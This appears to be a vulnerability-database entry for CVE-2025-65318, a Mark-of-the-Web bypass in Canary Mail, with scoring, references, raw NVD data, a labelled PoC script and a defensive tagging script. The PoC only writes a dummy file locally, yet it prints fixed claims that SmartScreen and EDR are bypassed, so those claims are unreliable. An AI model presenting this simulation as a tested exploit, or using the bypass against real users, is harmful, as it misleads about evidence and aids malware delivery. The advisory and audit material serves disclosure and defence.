Security Vulnerability Report
CVE-2025-65318 CVSS 9.1 CRITICAL

CVE-2025-65318

Published: 2025-12-16 16:16:00
Last Modified: 2025-12-31 00:38:32

Description

When using the attachment interaction functionality, Canary Mail 5.1.40 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Weakness
CWE-693 (Protection Mechanism Failure)

Configurations (Affected Products)

cpe:2.3:a:canarymail:canary_mail:*:*:*:*:*:windows:*:* - VULNERABLE
Canary Mail <= 5.1.40

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-65318 PoC - Mark-of-the-Web Bypass via Canary Mail Attachment
# This PoC demonstrates the absence of Zone.Identifier on files saved via Canary Mail
import os


def check_motw_exists(file_path):
    """Check if the Mark-of-the-Web zone identifier exists for a file"""
    try:
        # Zone.Identifier is stored in an NTFS Alternate Data Stream
        ads_path = file_path + ':Zone.Identifier'
        if os.path.exists(ads_path):
            with open(ads_path, 'r') as f:
                content = f.read()
            print(f'[+] Zone.Identifier found: {content}')
            return True
        else:
            print('[-] No Zone.Identifier found - MotW missing!')
            return False
    except Exception as e:
        print(f'[-] Error checking MotW: {e}')
        return False


def create_malicious_attachment():
    """Create a malicious document for demonstration"""
    # This represents a document that would be saved via Canary Mail
    # In a real attack, this could be an Office document with malicious macros
    malicious_content = b'MZ' + b'\x00' * 100  # Simulated executable header
    return malicious_content


def simulate_canary_mail_save(file_data, output_path):
    """
    Simulate how Canary Mail saves attachments WITHOUT MotW
    This is the vulnerable behavior that causes CVE-2025-65318
    """
    try:
        with open(output_path, 'wb') as f:
            f.write(file_data)
        # Check if MotW was added (it won't be in the vulnerable version)
        has_motw = check_motw_exists(output_path)
        if not has_motw:
            print('[!] VULNERABLE: File saved without Mark-of-the-Web!')
            print('[!] This file will bypass Windows SmartScreen and other protections')
        return not has_motw  # Returns True if vulnerable
    except Exception as e:
        print(f'[-] Error saving file: {e}')
        return False


def demonstrate_attack_scenario():
    """Demonstrate the attack scenario using this vulnerability"""
    print('=' * 60)
    print('CVE-2025-65318 Attack Scenario Demonstration')
    print('=' * 60)
    # Step 1: Attacker sends email with malicious attachment via Canary Mail
    print('\n[Step 1] Attacker sends email with malicious attachment')
    # Step 2: Victim uses Canary Mail to save the attachment
    print('\n[Step 2] Victim saves attachment using Canary Mail')
    test_file = 'malicious_document.docm'
    file_data = create_malicious_attachment()
    is_vulnerable = simulate_canary_mail_save(file_data, test_file)
    # Step 3: Without MotW, the file bypasses security checks
    if is_vulnerable:
        print('\n[Step 3] File bypasses security mechanisms:')
        print(' - Windows SmartScreen: BYPASSED')
        print(' - Office Protected View: DISABLED')
        print(' - EDR Behavioral Detection: WEAKENED')
    # Cleanup
    if os.path.exists(test_file):
        os.remove(test_file)
    return is_vulnerable


if __name__ == '__main__':
    demonstrate_attack_scenario()
```
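As an added example (not part of this report or of the linked PoC repository), the script below takes the defender's side of the issue described above: it audits a folder of saved attachments for files with no usable Zone.Identifier stream and, when asked, writes an Internet-zone Mark-of-the-Web so SmartScreen and Office Protected View apply to them again. It assumes Windows with NTFS for real use; the directory and the sample attachment it builds are constructed test input.

```python
import os
import tempfile

ZONE_STREAM = ":Zone.Identifier"  # NTFS alternate data stream that carries the MotW
ZONE_INTERNET = 3                 # URLZONE_INTERNET, the zone SmartScreen/Protected View act on

def build_zone_identifier(zone_id=ZONE_INTERNET, host_url=None):
    """Text Windows stores in the Zone.Identifier stream (CRLF-terminated INI)."""
    lines = ["[ZoneTransfer]", f"ZoneId={zone_id}"]
    if host_url:
        lines.append(f"HostUrl={host_url}")
    return "\r\n".join(lines) + "\r\n"

def parse_zone_id(text):
    """Return the ZoneId from stream text, or None if absent or malformed."""
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "zoneid":
            try:
                return int(value.strip())
            except ValueError:
                return None
    return None

def audit_and_tag(directory, apply=False):
    """List files in directory that carry no usable MotW; tag them as Internet when apply=True."""
    missing = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        # Off NTFS the stream path is an ordinary file with ':' in its name; skip those.
        if not os.path.isfile(path) or ZONE_STREAM in name:
            continue
        try:
            with open(path + ZONE_STREAM, "r") as stream:
                if parse_zone_id(stream.read()) is not None:
                    continue
        except OSError:
            pass  # no stream at all: saved without a MotW, as in the vulnerable client
        missing.append(path)
        if apply:
            with open(path + ZONE_STREAM, "w", newline="") as stream:  # newline="" keeps CRLF
                stream.write(build_zone_identifier())
    return missing

def constructed_sample_dir():
    """Constructed sample input: one attachment saved with no Zone.Identifier stream."""
    d = tempfile.mkdtemp(prefix="motw-audit-")
    with open(os.path.join(d, "report.docm"), "wb") as f:
        f.write(b"constructed placeholder, not a real document")
    return d
```

Run `audit_and_tag(r"C:\path\to\saved\attachments")` first to see what is untagged, then with `apply=True` to tag it; the constructed sample directory only exercises the logic.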

References

http://canary.com (Broken Link)
http://canarymail.com (Broken Link)
https://drive.google.com/file/d/14wrTzvcLPfFsWmy-SAtDwwZKKPssBsx5/view (Exploit)
https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319 (Exploit, Third Party Advisory)
https://github.com/nickvourd/RTI-Toolkit (Not Applicable)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-65318", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:15:59.673", "lastModified": "2025-12-31T00:38:32.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When using the attachment interaction functionality, Canary Mail 5.1.40 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canarymail:canary_mail:*:*:*:*:*:windows:*:*", "versionEndIncluding": "5.1.40", "matchCriteriaId": "7B155EAD-E397-419A-AEF7-1693131AF515"}]}]}], "references": [{"url": "http://canary.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://canarymail.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://drive.google.com/file/d/14wrTzvcLPfFsWmy-SAtDwwZKKPssBsx5/view", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/nickvourd/RTI-Toolkit", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
```